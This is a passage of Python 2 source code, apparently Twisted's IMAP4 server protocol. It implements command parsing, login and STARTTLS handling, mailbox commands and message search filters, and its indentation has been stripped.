cmbx = ICloseableMailbox(self.mbox, None)
if cmbx is not None:
maybeDeferred(cmbx.close).addErrback(log.err)
self.mbox = None
self.state = 'timeout'
def rawDataReceived(self, data):
self.resetTimeout()
passon = self._pendingLiteral.write(data)
if passon is not None:
self.setLineMode(passon)
# Avoid processing commands while buffers are being dumped to
# our transport
blocked = None
def _unblock(self):
commands = self.blocked
self.blocked = None
while commands and self.blocked is None:
self.lineReceived(commands.pop(0))
if self.blocked is not None:
self.blocked.extend(commands)
def lineReceived(self, line):
if self.blocked is not None:
self.blocked.append(line)
return
self.resetTimeout()
f = getattr(self, 'parse_' + self.parseState)
try:
f(line)
except Exception, e:
self.sendUntaggedResponse('BAD Server error: ' + str(e))
log.err()
def parse_command(self, line):
args = line.split(None, 2)
rest = None
if len(args) == 3:
tag, cmd, rest = args
elif len(args) == 2:
tag, cmd = args
elif len(args) == 1:
tag = args[0]
self.sendBadResponse(tag, 'Missing command')
return None
else:
self.sendBadResponse(None, 'Null command')
return None
cmd = cmd.upper()
try:
return self.dispatchCommand(tag, cmd, rest)
except IllegalClientResponse, e:
self.sendBadResponse(tag, 'Illegal syntax: ' + str(e))
except IllegalOperation, e:
self.sendNegativeResponse(tag, 'Illegal operation: ' + str(e))
except IllegalMailboxEncoding, e:
self.sendNegativeResponse(tag, 'Illegal mailbox name: ' + str(e))
def parse_pending(self, line):
d = self._pendingLiteral
self._pendingLiteral = None
self.parseState = 'command'
d.callback(line)
def dispatchCommand(self, tag, cmd, rest, uid=None):
f = self.lookupCommand(cmd)
if f:
fn = f[0]
parseargs = f[1:]
self.__doCommand(tag, fn, [self, tag], parseargs, rest, uid)
else:
self.sendBadResponse(tag, 'Unsupported command')
def lookupCommand(self, cmd):
return getattr(self, '_'.join((self.state, cmd.upper())), None)
def __doCommand(self, tag, handler, args, parseargs, line, uid):
for (i, arg) in enumerate(parseargs):
if callable(arg):
parseargs = parseargs[i+1:]
maybeDeferred(arg, self, line).addCallback(
self.__cbDispatch, tag, handler, args,
parseargs, uid).addErrback(self.__ebDispatch, tag)
return
else:
args.append(arg)
if line:
# Too many arguments
raise IllegalClientResponse("Too many arguments for command: " + repr(line))
if uid is not None:
handler(uid=uid, *args)
else:
handler(*args)
def __cbDispatch(self, (arg, rest), tag, fn, args, parseargs, uid):
args.append(arg)
self.__doCommand(tag, fn, args, parseargs, rest, uid)
def __ebDispatch(self, failure, tag):
if failure.check(IllegalClientResponse):
self.sendBadResponse(tag, 'Illegal syntax: ' + str(failure.value))
elif failure.check(IllegalOperation):
self.sendNegativeResponse(tag, 'Illegal operation: ' +
str(failure.value))
elif failure.check(IllegalMailboxEncoding):
self.sendNegativeResponse(tag, 'Illegal mailbox name: ' +
str(failure.value))
else:
self.sendBadResponse(tag, 'Server error: ' + str(failure.value))
log.err(failure)
def _stringLiteral(self, size):
if size > self._literalStringLimit:
raise IllegalClientResponse(
"Literal too long! I accept at most %d octets" %
(self._literalStringLimit,))
d = defer.Deferred()
self.parseState = 'pending'
self._pendingLiteral = LiteralString(size, d)
self.sendContinuationRequest('Ready for %d octets of text' % size)
self.setRawMode()
return d
def _fileLiteral(self, size):
d = defer.Deferred()
self.parseState = 'pending'
self._pendingLiteral = LiteralFile(size, d)
self.sendContinuationRequest('Ready for %d octets of data' % size)
self.setRawMode()
return d
def arg_astring(self, line):
"""
Parse an astring from the line, return (arg, rest), possibly
via a deferred (to handle literals)
"""
line = line.strip()
if not line:
raise IllegalClientResponse("Missing argument")
d = None
arg, rest = None, None
if line[0] == '"':
try:
spam, arg, rest = line.split('"',2)
rest = rest[1:] # Strip space
except ValueError:
raise IllegalClientResponse("Unmatched quotes")
elif line[0] == '{':
# literal
if line[-1] != '}':
raise IllegalClientResponse("Malformed literal")
try:
size = int(line[1:-1])
except ValueError:
raise IllegalClientResponse("Bad literal size: " + line[1:-1])
d = self._stringLiteral(size)
else:
arg = line.split(' ',1)
if len(arg) == 1:
arg.append('')
arg, rest = arg
return d or (arg, rest)
# ATOM: Any CHAR except ( ) { % * " \ ] CTL SP (CHAR is 7bit)
atomre = re.compile(r'(?P<atom>[^\](){%*"\\\x00-\x20\x80-\xff]+)( (?P<rest>.*$)|$)')
def arg_atom(self, line):
"""
Parse an atom from the line
"""
if not line:
raise IllegalClientResponse("Missing argument")
m = self.atomre.match(line)
if m:
return m.group('atom'), m.group('rest')
else:
raise IllegalClientResponse("Malformed ATOM")
def arg_plist(self, line):
"""
Parse a (non-nested) parenthesised list from the line
"""
if not line:
raise IllegalClientResponse("Missing argument")
if line[0] != "(":
raise IllegalClientResponse("Missing parenthesis")
i = line.find(")")
if i == -1:
raise IllegalClientResponse("Mismatched parenthesis")
return (parseNestedParens(line[1:i],0), line[i+2:])
def arg_literal(self, line):
"""
Parse a literal from the line
"""
if not line:
raise IllegalClientResponse("Missing argument")
if line[0] != '{':
raise IllegalClientResponse("Missing literal")
if line[-1] != '}':
raise IllegalClientResponse("Malformed literal")
try:
size = int(line[1:-1])
except ValueError:
raise IllegalClientResponse("Bad literal size: " + line[1:-1])
return self._fileLiteral(size)
def arg_searchkeys(self, line):
"""
searchkeys
"""
query = parseNestedParens(line)
# XXX Should really use list of search terms and parse into
# a proper tree
return (query, '')
def arg_seqset(self, line):
"""
sequence-set
"""
rest = ''
arg = line.split(' ',1)
if len(arg) == 2:
rest = arg[1]
arg = arg[0]
try:
return (parseIdList(arg), rest)
except IllegalIdentifierError, e:
raise IllegalClientResponse("Bad message number " + str(e))
def arg_fetchatt(self, line):
"""
fetch-att
"""
p = _FetchParser()
p.parseString(line)
return (p.result, '')
def arg_flaglist(self, line):
"""
Flag part of store-att-flag
"""
flags = []
if line[0] == '(':
if line[-1] != ')':
raise IllegalClientResponse("Mismatched parenthesis")
line = line[1:-1]
while line:
m = self.atomre.search(line)
if not m:
raise IllegalClientResponse("Malformed flag")
if line[0] == '\\' and m.start() == 1:
flags.append('\\' + m.group('atom'))
elif m.start() == 0:
flags.append(m.group('atom'))
else:
raise IllegalClientResponse("Malformed flag")
line = m.group('rest')
return (flags, '')
def arg_line(self, line):
"""
Command line of UID command
"""
return (line, '')
def opt_plist(self, line):
"""
Optional parenthesised list
"""
if line.startswith('('):
return self.arg_plist(line)
else:
return (None, line)
def opt_datetime(self, line):
"""
Optional date-time string
"""
if line.startswith('"'):
try:
spam, date, rest = line.split('"',2)
except IndexError:
raise IllegalClientResponse("Malformed date-time")
return (date, rest[1:])
else:
return (None, line)
def opt_charset(self, line):
"""
Optional charset of SEARCH command
"""
if line[:7].upper() == 'CHARSET':
arg = line.split(' ',2)
if len(arg) == 1:
raise IllegalClientResponse("Missing charset identifier")
if len(arg) == 2:
arg.append('')
spam, arg, rest = arg
return (arg, rest)
else:
return (None, line)
def sendServerGreeting(self):
msg = '[CAPABILITY %s] %s' % (' '.join(self.listCapabilities()), self.IDENT)
self.sendPositiveResponse(message=msg)
def sendBadResponse(self, tag = None, message = ''):
self._respond('BAD', tag, message)
def sendPositiveResponse(self, tag = None, message = ''):
self._respond('OK', tag, message)
def sendNegativeResponse(self, tag = None, message = ''):
self._respond('NO', tag, message)
def sendUntaggedResponse(self, message, async=False):
if not async or (self.blocked is None):
self._respond(message, None, None)
else:
self._queuedAsync.append(message)
def sendContinuationRequest(self, msg = 'Ready for additional command text'):
if msg:
self.sendLine('+ ' + msg)
else:
self.sendLine('+')
def _respond(self, state, tag, message):
if state in ('OK', 'NO', 'BAD') and self._queuedAsync:
lines = self._queuedAsync
self._queuedAsync = []
for msg in lines:
self._respond(msg, None, None)
if not tag:
tag = '*'
if message:
self.sendLine(' '.join((tag, state, message)))
else:
self.sendLine(' '.join((tag, state)))
def listCapabilities(self):
caps = ['IMAP4rev1']
for c, v in self.capabilities().iteritems():
if v is None:
caps.append(c)
elif len(v):
caps.extend([('%s=%s' % (c, cap)) for cap in v])
return caps
def do_CAPABILITY(self, tag):
self.sendUntaggedResponse('CAPABILITY ' + ' '.join(self.listCapabilities()))
self.sendPositiveResponse(tag, 'CAPABILITY completed')
unauth_CAPABILITY = (do_CAPABILITY,)
auth_CAPABILITY = unauth_CAPABILITY
select_CAPABILITY = unauth_CAPABILITY
logout_CAPABILITY = unauth_CAPABILITY
def do_LOGOUT(self, tag):
self.sendUntaggedResponse('BYE Nice talking to you')
self.sendPositiveResponse(tag, 'LOGOUT successful')
self.transport.loseConnection()
unauth_LOGOUT = (do_LOGOUT,)
auth_LOGOUT = unauth_LOGOUT
select_LOGOUT = unauth_LOGOUT
logout_LOGOUT = unauth_LOGOUT
def do_NOOP(self, tag):
self.sendPositiveResponse(tag, 'NOOP No operation performed')
unauth_NOOP = (do_NOOP,)
auth_NOOP = unauth_NOOP
select_NOOP = unauth_NOOP
logout_NOOP = unauth_NOOP
def do_AUTHENTICATE(self, tag, args):
args = args.upper().strip()
if args not in self.challengers:
self.sendNegativeResponse(tag, 'AUTHENTICATE method unsupported')
else:
self.authenticate(self.challengers[args](), tag)
unauth_AUTHENTICATE = (do_AUTHENTICATE, arg_atom)
def authenticate(self, chal, tag):
if self.portal is None:
self.sendNegativeResponse(tag, 'Temporary authentication failure')
return
self._setupChallenge(chal, tag)
def _setupChallenge(self, chal, tag):
try:
challenge = chal.getChallenge()
except Exception, e:
self.sendBadResponse(tag, 'Server error: ' + str(e))
else:
coded = base64.encodestring(challenge)[:-1]
self.parseState = 'pending'
self._pendingLiteral = defer.Deferred()
self.sendContinuationRequest(coded)
self._pendingLiteral.addCallback(self.__cbAuthChunk, chal, tag)
self._pendingLiteral.addErrback(self.__ebAuthChunk, tag)
def __cbAuthChunk(self, result, chal, tag):
try:
uncoded = base64.decodestring(result)
except binascii.Error:
raise IllegalClientResponse("Malformed Response - not base64")
chal.setResponse(uncoded)
if chal.moreChallenges():
self._setupChallenge(chal, tag)
else:
self.portal.login(chal, None, IAccount).addCallbacks(
self.__cbAuthResp,
self.__ebAuthResp,
(tag,), None, (tag,), None
)
def __cbAuthResp(self, (iface, avatar, logout), tag):
assert iface is IAccount, "IAccount is the only supported interface"
self.account = avatar
self.state = 'auth'
self._onLogout = logout
self.sendPositiveResponse(tag, 'Authentication successful')
self.setTimeout(self.POSTAUTH_TIMEOUT)
def __ebAuthResp(self, failure, tag):
if failure.check(cred.error.UnauthorizedLogin):
self.sendNegativeResponse(tag, 'Authentication failed: unauthorized')
elif failure.check(cred.error.UnhandledCredentials):
self.sendNegativeResponse(tag, 'Authentication failed: server misconfigured')
else:
self.sendBadResponse(tag, 'Server error: login failed unexpectedly')
log.err(failure)
def __ebAuthChunk(self, failure, tag):
self.sendNegativeResponse(tag, 'Authentication failed: ' + str(failure.value))
def do_STARTTLS(self, tag):
if self.startedTLS:
self.sendNegativeResponse(tag, 'TLS already negotiated')
elif self.ctx and self.canStartTLS:
self.sendPositiveResponse(tag, 'Begin TLS negotiation now')
self.transport.startTLS(self.ctx)
self.startedTLS = True
self.challengers = self.challengers.copy()
if 'LOGIN' not in self.challengers:
self.challengers['LOGIN'] = LOGINCredentials
if 'PLAIN' not in self.challengers:
self.challengers['PLAIN'] = PLAINCredentials
else:
self.sendNegativeResponse(tag, 'TLS not available')
unauth_STARTTLS = (do_STARTTLS,)
def do_LOGIN(self, tag, user, passwd):
if 'LOGINDISABLED' in self.capabilities():
self.sendBadResponse(tag, 'LOGIN is disabled before STARTTLS')
return
maybeDeferred(self.authenticateLogin, user, passwd
).addCallback(self.__cbLogin, tag
).addErrback(self.__ebLogin, tag
)
unauth_LOGIN = (do_LOGIN, arg_astring, arg_astring)
def authenticateLogin(self, user, passwd):
"""Lookup the account associated with the given parameters
Override this method to define the desired authentication behavior.
The default behavior is to defer authentication to C{self.portal}
if it is not None, or to deny the login otherwise.
@type user: C{str}
@param user: The username to lookup
@type passwd: C{str}
@param passwd: The password to login with
"""
if self.portal:
return self.portal.login(
cred.credentials.UsernamePassword(user, passwd),
None, IAccount
)
raise cred.error.UnauthorizedLogin()
def __cbLogin(self, (iface, avatar, logout), tag):
if iface is not IAccount:
self.sendBadResponse(tag, 'Server error: login returned unexpected value')
log.err("__cbLogin called with %r, IAccount expected" % (iface,))
else:
self.account = avatar
self._onLogout = logout
self.sendPositiveResponse(tag, 'LOGIN succeeded')
self.state = 'auth'
self.setTimeout(self.POSTAUTH_TIMEOUT)
def __ebLogin(self, failure, tag):
if failure.check(cred.error.UnauthorizedLogin):
self.sendNegativeResponse(tag, 'LOGIN failed')
else:
self.sendBadResponse(tag, 'Server error: ' + str(failure.value))
log.err(failure)
def do_NAMESPACE(self, tag):
personal = public = shared = None
np = INamespacePresenter(self.account, None)
if np is not None:
personal = np.getPersonalNamespaces()
public = np.getSharedNamespaces()
shared = np.getSharedNamespaces()
self.sendUntaggedResponse('NAMESPACE ' + collapseNestedLists([personal, public, shared]))
self.sendPositiveResponse(tag, "NAMESPACE command completed")
auth_NAMESPACE = (do_NAMESPACE,)
select_NAMESPACE = auth_NAMESPACE
def _parseMbox(self, name):
if isinstance(name, unicode):
return name
try:
return name.decode('imap4-utf-7')
except:
log.err()
raise IllegalMailboxEncoding(name)
def _selectWork(self, tag, name, rw, cmdName):
if self.mbox:
self.mbox.removeListener(self)
cmbx = ICloseableMailbox(self.mbox, None)
if cmbx is not None:
maybeDeferred(cmbx.close).addErrback(log.err)
self.mbox = None
self.state = 'auth'
name = self._parseMbox(name)
maybeDeferred(self.account.select, self._parseMbox(name), rw
).addCallback(self._cbSelectWork, cmdName, tag
).addErrback(self._ebSelectWork, cmdName, tag
)
def _ebSelectWork(self, failure, cmdName, tag):
self.sendBadResponse(tag, "%s failed: Server error" % (cmdName,))
log.err(failure)
def _cbSelectWork(self, mbox, cmdName, tag):
if mbox is None:
self.sendNegativeResponse(tag, 'No such mailbox')
return
if '\\noselect' in [s.lower() for s in mbox.getFlags()]:
self.sendNegativeResponse(tag, 'Mailbox cannot be selected')
return
flags = mbox.getFlags()
self.sendUntaggedResponse(str(mbox.getMessageCount()) + ' EXISTS')
self.sendUntaggedResponse(str(mbox.getRecentCount()) + ' RECENT')
self.sendUntaggedResponse('FLAGS (%s)' % ' '.join(flags))
self.sendPositiveResponse(None, '[UIDVALIDITY %d]' % mbox.getUIDValidity())
s = mbox.isWriteable() and 'READ-WRITE' or 'READ-ONLY'
mbox.addListener(self)
self.sendPositiveResponse(tag, '[%s] %s successful' % (s, cmdName))
self.state = 'select'
self.mbox = mbox
auth_SELECT = ( _selectWork, arg_astring, 1, 'SELECT' )
select_SELECT = auth_SELECT
auth_EXAMINE = ( _selectWork, arg_astring, 0, 'EXAMINE' )
select_EXAMINE = auth_EXAMINE
def do_IDLE(self, tag):
self.sendContinuationRequest(None)
self.parseTag = tag
self.lastState = self.parseState
self.parseState = 'idle'
def parse_idle(self, *args):
self.parseState = self.lastState
del self.lastState
self.sendPositiveResponse(self.parseTag, "IDLE terminated")
del self.parseTag
select_IDLE = ( do_IDLE, )
auth_IDLE = select_IDLE
def do_CREATE(self, tag, name):
name = self._parseMbox(name)
try:
result = self.account.create(name)
except MailboxException, c:
self.sendNegativeResponse(tag, str(c))
except:
self.sendBadResponse(tag, "Server error encountered while creating mailbox")
log.err()
else:
if result:
self.sendPositiveResponse(tag, 'Mailbox created')
else:
self.sendNegativeResponse(tag, 'Mailbox not created')
auth_CREATE = (do_CREATE, arg_astring)
select_CREATE = auth_CREATE
def do_DELETE(self, tag, name):
name = self._parseMbox(name)
if name.lower() == 'inbox':
self.sendNegativeResponse(tag, 'You cannot delete the inbox')
return
try:
self.account.delete(name)
except MailboxException, m:
self.sendNegativeResponse(tag, str(m))
except:
self.sendBadResponse(tag, "Server error encountered while deleting mailbox")
log.err()
else:
self.sendPositiveResponse(tag, 'Mailbox deleted')
auth_DELETE = (do_DELETE, arg_astring)
select_DELETE = auth_DELETE
def do_RENAME(self, tag, oldname, newname):
oldname, newname = [self._parseMbox(n) for n in oldname, newname]
if oldname.lower() == 'inbox' or newname.lower() == 'inbox':
self.sendNegativeResponse(tag, 'You cannot rename the inbox, or rename another mailbox to inbox.')
return
try:
self.account.rename(oldname, newname)
except TypeError:
self.sendBadResponse(tag, 'Invalid command syntax')
except MailboxException, m:
self.sendNegativeResponse(tag, str(m))
except:
self.sendBadResponse(tag, "Server error encountered while renaming mailbox")
log.err()
else:
self.sendPositiveResponse(tag, 'Mailbox renamed')
auth_RENAME = (do_RENAME, arg_astring, arg_astring)
select_RENAME = auth_RENAME
def do_SUBSCRIBE(self, tag, name):
name = self._parseMbox(name)
try:
self.account.subscribe(name)
except MailboxException, m:
self.sendNegativeResponse(tag, str(m))
except:
self.sendBadResponse(tag, "Server error encountered while subscribing to mailbox")
log.err()
else:
self.sendPositiveResponse(tag, 'Subscribed')
auth_SUBSCRIBE = (do_SUBSCRIBE, arg_astring)
select_SUBSCRIBE = auth_SUBSCRIBE
def do_UNSUBSCRIBE(self, tag, name):
name = self._parseMbox(name)
try:
self.account.unsubscribe(name)
except MailboxException, m:
self.sendNegativeResponse(tag, str(m))
except:
self.sendBadResponse(tag, "Server error encountered while unsubscribing from mailbox")
log.err()
else:
self.sendPositiveResponse(tag, 'Unsubscribed')
auth_UNSUBSCRIBE = (do_UNSUBSCRIBE, arg_astring)
select_UNSUBSCRIBE = auth_UNSUBSCRIBE
def _listWork(self, tag, ref, mbox, sub, cmdName):
mbox = self._parseMbox(mbox)
maybeDeferred(self.account.listMailboxes, ref, mbox
).addCallback(self._cbListWork, tag, sub, cmdName
).addErrback(self._ebListWork, tag
)
def _cbListWork(self, mailboxes, tag, sub, cmdName):
for (name, box) in mailboxes:
if not sub or self.account.isSubscribed(name):
flags = box.getFlags()
delim = box.getHierarchicalDelimiter()
resp = (DontQuoteMe(cmdName), map(DontQuoteMe, flags), delim, name.encode('imap4-utf-7'))
self.sendUntaggedResponse(collapseNestedLists(resp))
self.sendPositiveResponse(tag, '%s completed' % (cmdName,))
def _ebListWork(self, failure, tag):
self.sendBadResponse(tag, "Server error encountered while listing mailboxes.")
log.err(failure)
auth_LIST = (_listWork, arg_astring, arg_astring, 0, 'LIST')
select_LIST = auth_LIST
auth_LSUB = (_listWork, arg_astring, arg_astring, 1, 'LSUB')
select_LSUB = auth_LSUB
def do_STATUS(self, tag, mailbox, names):
mailbox = self._parseMbox(mailbox)
maybeDeferred(self.account.select, mailbox, 0
).addCallback(self._cbStatusGotMailbox, tag, mailbox, names
).addErrback(self._ebStatusGotMailbox, tag
)
def _cbStatusGotMailbox(self, mbox, tag, mailbox, names):
if mbox:
maybeDeferred(mbox.requestStatus, names).addCallbacks(
self.__cbStatus, self.__ebStatus,
(tag, mailbox), None, (tag, mailbox), None
)
else:
self.sendNegativeResponse(tag, "Could not open mailbox")
def _ebStatusGotMailbox(self, failure, tag):
self.sendBadResponse(tag, "Server error encountered while opening mailbox.")
log.err(failure)
auth_STATUS = (do_STATUS, arg_astring, arg_plist)
select_STATUS = auth_STATUS
def __cbStatus(self, status, tag, box):
line = ' '.join(['%s %s' % x for x in status.iteritems()])
self.sendUntaggedResponse('STATUS %s (%s)' % (box, line))
self.sendPositiveResponse(tag, 'STATUS complete')
def __ebStatus(self, failure, tag, box):
self.sendBadResponse(tag, 'STATUS %s failed: %s' % (box, str(failure.value)))
def do_APPEND(self, tag, mailbox, flags, date, message):
mailbox = self._parseMbox(mailbox)
maybeDeferred(self.account.select, mailbox
).addCallback(self._cbAppendGotMailbox, tag, flags, date, message
).addErrback(self._ebAppendGotMailbox, tag
)
def _cbAppendGotMailbox(self, mbox, tag, flags, date, message):
if not mbox:
self.sendNegativeResponse(tag, '[TRYCREATE] No such mailbox')
return
d = mbox.addMessage(message, flags, date)
d.addCallback(self.__cbAppend, tag, mbox)
d.addErrback(self.__ebAppend, tag)
def _ebAppendGotMailbox(self, failure, tag):
self.sendBadResponse(tag, "Server error encountered while opening mailbox.")
log.err(failure)
auth_APPEND = (do_APPEND, arg_astring, opt_plist, opt_datetime,
arg_literal)
select_APPEND = auth_APPEND
def __cbAppend(self, result, tag, mbox):
self.sendUntaggedResponse('%d EXISTS' % mbox.getMessageCount())
self.sendPositiveResponse(tag, 'APPEND complete')
def __ebAppend(self, failure, tag):
self.sendBadResponse(tag, 'APPEND failed: ' + str(failure.value))
def do_CHECK(self, tag):
d = self.checkpoint()
if d is None:
self.__cbCheck(None, tag)
else:
d.addCallbacks(
self.__cbCheck,
self.__ebCheck,
callbackArgs=(tag,),
errbackArgs=(tag,)
)
select_CHECK = (do_CHECK,)
def __cbCheck(self, result, tag):
self.sendPositiveResponse(tag, 'CHECK completed')
def __ebCheck(self, failure, tag):
self.sendBadResponse(tag, 'CHECK failed: ' + str(failure.value))
def checkpoint(self):
"""Called when the client issues a CHECK command.
This should perform any checkpoint operations required by the server.
It may be a long running operation, but may not block. If it returns
a deferred, the client will only be informed of success (or failure)
when the deferred's callback (or errback) is invoked.
"""
return None
def do_CLOSE(self, tag):
d = None
if self.mbox.isWriteable():
d = maybeDeferred(self.mbox.expunge)
cmbx = ICloseableMailbox(self.mbox, None)
if cmbx is not None:
if d is not None:
d.addCallback(lambda result: cmbx.close())
else:
d = maybeDeferred(cmbx.close)
if d is not None:
d.addCallbacks(self.__cbClose, self.__ebClose, (tag,), None, (tag,), None)
else:
self.__cbClose(None, tag)
select_CLOSE = (do_CLOSE,)
def __cbClose(self, result, tag):
self.sendPositiveResponse(tag, 'CLOSE completed')
self.mbox.removeListener(self)
self.mbox = None
self.state = 'auth'
def __ebClose(self, failure, tag):
self.sendBadResponse(tag, 'CLOSE failed: ' + str(failure.value))
def do_EXPUNGE(self, tag):
if self.mbox.isWriteable():
maybeDeferred(self.mbox.expunge).addCallbacks(
self.__cbExpunge, self.__ebExpunge, (tag,), None, (tag,), None
)
else:
self.sendNegativeResponse(tag, 'EXPUNGE ignored on read-only mailbox')
select_EXPUNGE = (do_EXPUNGE,)
def __cbExpunge(self, result, tag):
for e in result:
self.sendUntaggedResponse('%d EXPUNGE' % e)
self.sendPositiveResponse(tag, 'EXPUNGE completed')
def __ebExpunge(self, failure, tag):
self.sendBadResponse(tag, 'EXPUNGE failed: ' + str(failure.value))
log.err(failure)
def do_SEARCH(self, tag, charset, query, uid=0):
sm = ISearchableMailbox(self.mbox, None)
if sm is not None:
maybeDeferred(sm.search, query, uid=uid).addCallbacks(
self.__cbSearch, self.__ebSearch,
(tag, self.mbox, uid), None, (tag,), None
)
else:
# that's not the ideal way to get all messages, there should be a
# method on mailboxes that gives you all of them
s = parseIdList('1:*')
maybeDeferred(self.mbox.fetch, s, uid=uid).addCallbacks(
self.__cbManualSearch, self.__ebSearch,
(tag, self.mbox, query, uid), None, (tag,), None
)
select_SEARCH = (do_SEARCH, opt_charset, arg_searchkeys)
def __cbSearch(self, result, tag, mbox, uid):
if uid:
result = map(mbox.getUID, result)
ids = ' '.join([str(i) for i in result])
self.sendUntaggedResponse('SEARCH ' + ids)
self.sendPositiveResponse(tag, 'SEARCH completed')
def __cbManualSearch(self, result, tag, mbox, query, uid,
searchResults=None):
"""
Apply the search filter to a set of messages. Send the response to the
client.
@type result: C{list} of C{tuple} of (C{int}, provider of
L{imap4.IMessage})
@param result: A list two tuples of messages with their sequence ids,
sorted by the ids in descending order.
@type tag: C{str}
@param tag: A command tag.
@type mbox: Provider of L{imap4.IMailbox}
@param mbox: The searched mailbox.
@type query: C{list}
@param query: A list representing the parsed form of the search query.
@param uid: A flag indicating whether the search is over message
sequence numbers or UIDs.
@type searchResults: C{list}
@param searchResults: The search results so far or C{None} if no
results yet.
"""
if searchResults is None:
searchResults = []
i = 0
# result is a list of tuples (sequenceId, Message)
lastSequenceId = result and result[-1][0]
lastMessageId = result and result[-1][1].getUID()
for (i, (id, msg)) in zip(range(5), result):
# searchFilter and singleSearchStep will mutate the query. Dang.
# Copy it here or else things will go poorly for subsequent
# messages.
if self._searchFilter(copy.deepcopy(query), id, msg,
lastSequenceId, lastMessageId):
if uid:
searchResults.append(str(msg.getUID()))
else:
searchResults.append(str(id))
if i == 4:
from twisted.internet import reactor
reactor.callLater(
0, self.__cbManualSearch, result[5:], tag, mbox, query, uid,
searchResults)
else:
if searchResults:
self.sendUntaggedResponse('SEARCH ' + ' '.join(searchResults))
self.sendPositiveResponse(tag, 'SEARCH completed')
def _searchFilter(self, query, id, msg, lastSequenceId, lastMessageId):
"""
Pop search terms from the beginning of C{query} until there are none
left and apply them to the given message.
@param query: A list representing the parsed form of the search query.
@param id: The sequence number of the message being checked.
@param msg: The message being checked.
@type lastSequenceId: C{int}
@param lastSequenceId: The highest sequence number of any message in
the mailbox being searched.
@type lastMessageId: C{int}
@param lastMessageId: The highest UID of any message in the mailbox
being searched.
@return: Boolean indicating whether all of the query terms match the
message.
"""
while query:
if not self._singleSearchStep(query, id, msg,
lastSequenceId, lastMessageId):
return False
return True
def _singleSearchStep(self, query, id, msg, lastSequenceId, lastMessageId):
"""
Pop one search term from the beginning of C{query} (possibly more than
one element) and return whether it matches the given message.
@param query: A list representing the parsed form of the search query.
@param id: The sequence number of the message being checked.
@param msg: The message being checked.
@param lastSequenceId: The highest sequence number of any message in
the mailbox being searched.
@param lastMessageId: The highest UID of any message in the mailbox
being searched.
@return: Boolean indicating whether the query term matched the message.
"""
q = query.pop(0)
if isinstance(q, list):
if not self._searchFilter(q, id, msg,
lastSequenceId, lastMessageId):
return False
else:
c = q.upper()
if not c[:1].isalpha():
# A search term may be a word like ALL, ANSWERED, BCC, etc (see
# below) or it may be a message sequence set. Here we
# recognize a message sequence set "N:M".
messageSet = parseIdList(c, lastSequenceId)
return id in messageSet
else:
f = getattr(self, 'search_' + c)
if f is not None:
if c in self._requiresLastMessageInfo:
result = f(query, id, msg, (lastSequenceId,
lastMessageId))
else:
result = f(query, id, msg)
if not result:
return False
return True
def search_ALL(self, query, id, msg):
"""
Returns C{True} if the message matches the ALL search key (always).
@type query: A C{list} of C{str}
@param query: A list representing the parsed query string.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
"""
return True
def search_ANSWERED(self, query, id, msg):
"""
Returns C{True} if the message has been answered.
@type query: A C{list} of C{str}
@param query: A list representing the parsed query string.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
"""
return '\\Answered' in msg.getFlags()
def search_BCC(self, query, id, msg):
"""
Returns C{True} if the message has a BCC address matching the query.
@type query: A C{list} of C{str}
@param query: A list whose first element is a BCC C{str}
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
"""
bcc = msg.getHeaders(False, 'bcc').get('bcc', '')
return bcc.lower().find(query.pop(0).lower()) != -1
def search_BEFORE(self, query, id, msg):
date = parseTime(query.pop(0))
return rfc822.parsedate(msg.getInternalDate()) < date
def search_BODY(self, query, id, msg):
body = query.pop(0).lower()
return text.strFile(body, msg.getBodyFile(), False)
def search_CC(self, query, id, msg):
cc = msg.getHeaders(False, 'cc').get('cc', '')
return cc.lower().find(query.pop(0).lower()) != -1
def search_DELETED(self, query, id, msg):
return '\\Deleted' in msg.getFlags()
def search_DRAFT(self, query, id, msg):
return '\\Draft' in msg.getFlags()
def search_FLAGGED(self, query, id, msg):
return '\\Flagged' in msg.getFlags()
def search_FROM(self, query, id, msg):
fm = msg.getHeaders(False, 'from').get('from', '')
return fm.lower().find(query.pop(0).lower()) != -1
def search_HEADER(self, query, id, msg):
hdr = query.pop(0).lower()
hdr = msg.getHeaders(False, hdr).get(hdr, '')
return hdr.lower().find(query.pop(0).lower()) != -1
def search_KEYWORD(self, query, id, msg):
query.pop(0)
return False
def search_LARGER(self, query, id, msg):
return int(query.pop(0)) < msg.getSize()
def search_NEW(self, query, id, msg):
return '\\Recent' in msg.getFlags() and '\\Seen' not in msg.getFlags()
def search_NOT(self, query, id, msg, (lastSequenceId, lastMessageId)):
"""
Returns C{True} if the message does not match the query.
@type query: A C{list} of C{str}
@param query: A list representing the parsed form of the search query.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
@param msg: The message being checked.
@type lastSequenceId: C{int}
@param lastSequenceId: The highest sequence number of a message in the
mailbox.
@type lastMessageId: C{int}
@param lastMessageId: The highest UID of a message in the mailbox.
"""
return not self._singleSearchStep(query, id, msg,
lastSequenceId, lastMessageId)
def search_OLD(self, query, id, msg):
return '\\Recent' not in msg.getFlags()
def search_ON(self, query, id, msg):
date = parseTime(query.pop(0))
return rfc822.parsedate(msg.getInternalDate()) == date
def search_OR(self, query, id, msg, (lastSequenceId, lastMessageId)):
"""
Returns C{True} if the message matches any of the first two query
items.
@type query: A C{list} of C{str}
@param query: A list representing the parsed form of the search query.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
@param msg: The message being checked.
@type lastSequenceId: C{int}
@param lastSequenceId: The highest sequence number of a message in the
mailbox.
@type lastMessageId: C{int}
@param lastMessageId: The highest UID of a message in the mailbox.
"""
a = self._singleSearchStep(query, id, msg,
lastSequenceId, lastMessageId)
b = self._singleSearchStep(query, id, msg,
lastSequenceId, lastMessageId)
return a or b
def search_RECENT(self, query, id, msg):
return '\\Recent' in msg.getFlags()
def search_SEEN(self, query, id, msg):
return '\\Seen' in msg.getFlags()
def search_SENTBEFORE(self, query, id, msg):
"""
Returns C{True} if the message date is earlier than the query date.
@type query: A C{list} of C{str}
@param query: A list whose first element starts with a stringified date
that is a fragment of an L{imap4.Query()}. The date must be in the
format 'DD-Mon-YYYY', for example '03-March-2003' or '03-Mar-2003'.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
"""
date = msg.getHeaders(False, 'date').get('date', '')
date = rfc822.parsedate(date)
return date < parseTime(query.pop(0))
